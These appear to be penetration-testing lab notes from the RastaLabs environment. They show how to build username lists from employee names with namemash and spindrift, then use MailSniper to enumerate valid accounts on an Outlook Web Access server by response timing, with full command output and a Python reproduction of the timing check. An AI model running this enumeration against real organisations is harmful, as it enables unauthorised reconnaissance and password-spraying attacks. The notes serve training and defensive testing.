First, we need to create a user list based on employee names (taken from LinkedIn or the company site).
The tool namemash will generate a list of multiple types of common email formats (first.last@, f.last@, last.first@, etc.).
$ cat employees.txt
Shelley Owen
Jordan Hunt
Patsy Morgan
Ruby Mckenzie
Dan Greer
$ /opt/namemash/namemash.py employees.txt
shelleyowen
owenshelley
shelley.owen
owen.shelley
owens
sowen
oshelley
s.owen
o.shelley
shelley
owen
jordanhunt
huntjordan
jordan.hunt
hunt.jordan
huntj
jhunt
hjordan
j.hunt
h.jordan
jordan
hunt
patsymorgan
morganpatsy
patsy.morgan
morgan.patsy
morganp
pmorgan
spindrift.py is a script from the SprayingToolkit repo that creates usernames from names.
python3 spindrift.py employees.txt --domain RLAB --format {f}{last}
RLAB\sowen
RLAB\jhunt
RLAB\pmorgan
RLAB\rmckenzie
RLAB\dgreer
python3 spindrift.py employees.txt --domain RLAB --format {f}.{last}
RLAB\s.owen
RLAB\j.hunt
RLAB\p.morgan
RLAB\r.mckenzie
RLAB\d.greer
GitHub: https://github.com/dafthack/MailSniper
PS C:\Users\iron\Documents\MailSniper-master> Invoke-UsernameHarvestOWA -ExchHostname 10.10.110.254 -UserList ..\userlist.txt -OutFile Owa-valid.txt
[*] Now spraying the OWA portal at https://10.10.110.254/owa/
Determining baseline response time...
Response Time (MS) Domain\Username
336 DQPuEV\fOetIC
272 iPXWOb\XyhrOx
201 vjcDyq\liUtgQ
226 IKcFGx\ImlsFY
180 dPUBCv\pqmVrA
Baseline Response: 243
Threshold: 145.8
Response Time (MS) Domain\Username
201 \huVHcP
203 \PGUkOH
207 \CeyRWF
195 \tsUlwp
228 \RtIMav
191 \RhysWeston
202 \EleanorPugh
207 \NicGodfrey
236 \AmberHope
132 \BradleyOwen
[*] Potentially Valid! User:\BradleyOwen
127 \TamiQuinn
[*] Potentially Valid! User:\TamiQuinn
91 \RWeston
[*] Potentially Valid! User:\RWeston
92 \EPugh
[*] Potentially Valid! User:\EPugh
136 \NGodfrey
[*] Potentially Valid! User:\NGodfrey
101 \AHope
[*] Potentially Valid! User:\AHope
95 \BOwen
[*] Potentially Valid! User:\BOwen
127 \TQuinn
[*] Potentially Valid! User:\TQuinn
132 \RhysW
[*] Potentially Valid! User:\RhysW
263 \EleanorP
153 \NicG
183 \AmberH
444 \BradleyO
147 \TamiQ
[*] A total of 9 potentially valid usernames found.
Results have been written to Owa-valid.txt.
[*] Harvesting domain name from the server at 10.10.110.254
[*] Couldn't get domain from Autodiscover URL. Trying EWS URL...
The domain appears to be: (mx01.rastalabs.local)
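Added example (not part of the original notes and not MailSniper's code): the transcript above flags a username when its response time falls below a threshold derived from the baseline. The Python below reproduces that classification from the baseline rows and a subset of the candidate rows listed above; the 0.6 factor is an assumption inferred from the transcript (145.8 / 243), and the function names are hypothetical.

```python
import re
from statistics import mean

# Baseline rows copied from the transcript above (random, nonexistent accounts).
BASELINE_LINES = r"""
336 DQPuEV\fOetIC
272 iPXWOb\XyhrOx
201 vjcDyq\liUtgQ
226 IKcFGx\ImlsFY
180 dPUBCv\pqmVrA
"""
# Subset of the candidate rows from the same transcript.
CANDIDATE_LINES = r"""
201 \huVHcP
236 \AmberHope
132 \BradleyOwen
127 \TamiQuinn
91 \RWeston
92 \EPugh
136 \NGodfrey
101 \AHope
95 \BOwen
127 \TQuinn
132 \RhysW
263 \EleanorP
153 \NicG
444 \BradleyO
147 \TamiQ
"""
# Assumption: inferred from the transcript (145.8 / 243), not read from the tool.
THRESHOLD_FACTOR = 0.6
ROW = re.compile(r"^(\d+)\s+(\S*\\\S+)$")

def parse(block):
    """Return [(ms, account)] for every '<ms> <domain>\\<user>' row."""
    matches = (ROW.match(line.strip()) for line in block.splitlines())
    return [(int(m.group(1)), m.group(2)) for m in matches if m]

def timing_oracle(baseline_block, candidate_block, factor=THRESHOLD_FACTOR):
    """Return (baseline_ms, threshold_ms, accounts answering faster than threshold)."""
    baseline = mean(ms for ms, _ in parse(baseline_block))
    threshold = baseline * factor
    flagged = [acct.lstrip("\\") for ms, acct in parse(candidate_block)
               if ms < threshold]
    return baseline, threshold, flagged
```

Running the same comparison on timings collected from your own server after a configuration change shows whether valid and invalid accounts are still distinguishable by response time.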